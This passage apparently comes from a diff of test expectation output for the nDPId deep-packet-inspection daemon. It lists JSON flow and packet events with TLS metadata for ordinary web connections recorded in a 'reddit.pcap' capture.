-00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2651,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687761,"flow_last_seen":1605291687852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687852,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2647,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687800,"flow_last_seen":1605291687829,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687829,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00975{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2651,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687761,"flow_last_seen":1605291687852,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687852,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687896,"flow_last_seen":1605291687896,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687896,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1605291687896,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687896,"pkt":"qtsDr8lk5EKm5WPyht1gD27HACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAieM+UmsoBu3fYetUAAAAAoAL9ICsYAAACBAWgBAIIClOdBf4AAAAAAQMDBw=="} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2916,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687931,"flow_last_seen":1605291687931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687931,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2916,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1605291687931,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687931,"pkt":"qtsDr8lk5EKm5WPyht1gCkMmACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1k4Bu9FF0vYAAAAAoAL9ILpIAAACBAWgBAIICnCSuGYAAAAAAQMDBw=="} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2917,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1605291687932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687932,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAACJ4z5QqAcsBIEmLB5kd7IUo3\/YpAbuayhO+xPN32HrWoBJXgPVcAAACBAV4AQMDAwQCCArC1z\/tU50F\/g=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2918,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1605291687932,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687932,"pkt":"qtsDr8lk5EKm5WPyht1gD27HACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAieM+UmsoBu3fYetYTvsT0gBAB+3lKAAABAQgKU50GIsLXP+0="} -00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2919,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687896,"flow_last_seen":1605291687933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00929{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2919,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687896,"flow_last_seen":1605291687933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00628{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2920,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687933,"flow_last_seen":1605291687933,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687933,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2920,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1605291687933,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687933,"pkt":"qtsDr8lk5EKm5WPyht1gBZTsACgGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIfkWUEn4fxCOvggBu9JG6EoAAAAAoAL9IFfFAAACBAWgBAIICteKYnsAAAAAAQMDBw=="} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2921,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687934,"flow_last_seen":1605291687934,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687934,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2921,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1605291687934,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687934,"pkt":"qtsDr8lk5EKm5WPyht1gA0MZACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAXNobxrOgBu0Y7yJAAAAAAoAL9ICibAAACBAWgBAIIClHJL\/gAAAAAAQMDBw=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2996,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1605291687966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687966,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvWTrVWRoTRRdL3oBJXgGFBAAACBAV4AQMDAwQCCArC10AQcJK4Zg=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2997,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1605291687966,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687966,"pkt":"qtsDr8lk5EKm5WPyht1gCkMmACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1k4Bu9FF0ve1VkaFgBAB++UvAAABAQgKcJK4icLXQBA="} -00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2998,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687931,"flow_last_seen":1605291687966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2998,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687931,"flow_last_seen":1605291687966,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687966,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2999,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1605291687974,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687974,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYgARaADQAh+RZQSfh\/EI4qAcsBIEmLB5kd7IUo3\/YpAbu+CLYiE5XSRuhLoBJXgDDhAAACBAV4AQMDAwQCCArC10AQ14piew=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3002,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1605291687974,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687974,"pkt":"qtsDr8lk5EKm5WPyht1gBZTsACAGQCoBywEgSYsHmR3shSjf9ikmIAEWgA0AIfkWUEn4fxCOvggBu9JG6Eu2IhOWgBAB+7TJAAABAQgK14pipMLXQBA="} -00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3004,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687933,"flow_last_seen":1605291687974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687974,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00956{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3004,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687933,"flow_last_seen":1605291687974,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687974,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3007,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1605291687975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687975,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAABc2hvEqAcsBIEmLB5kd7IUo3\/YpAbus6CNL5ddGO8iRoBJXgMJGAAACBAV4AQMDAwQCCArC10AVUckv+A=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3009,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1605291687975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687975,"pkt":"qtsDr8lk5EKm5WPyht1gA0MZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAAAXNobxrOgBu0Y7yJEjS+XYgBAB+0YvAAABAQgKUckwIcLXQBU="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3014,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687934,"flow_last_seen":1605291687975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687975,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00970{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3016,"source":"reddit.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687896,"flow_last_seen":1605291687976,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687976,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::2278:cf94","src_port":39626,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"id.rlcdn.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3105,"source":"reddit.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687931,"flow_last_seen":1605291688024,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688024,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":54862,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.youtube.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3113,"source":"reddit.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687934,"flow_last_seen":1605291688025,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688025,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::1736:86f1","src_port":44264,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01012{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3144,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3147,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1605291687933,"flow_last_seen":1605291688036,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3881,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1605291688036,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"secure.quantserve.com","server_names":"*.quantserve.com,*.quantcount.com,*.apextag.com,quantserve.com,quantcount.com,apextag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Quantcast Corporation, CN=*.quantserve.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"3A:30:B1:4A:CE:62:AF:55:B1:89:FF:0C:CB:69:E3:80:CB:B0:91:90"}} -01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3171,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01459{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":3174,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687800,"flow_last_seen":1605291688046,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":3956,"flow_avg_l4_payload_len":439,"midstream":0,"thread_ts_msec":1605291688046,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","server_names":"syndication.twitter.com,syndication.twimg.com,syndication-o.twitter.com,syndication-o.twimg.com,cdn.syndication.twitter.com,cdn.syndication.twimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"8d2a028aa94425f76ced7826b1f39039","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San 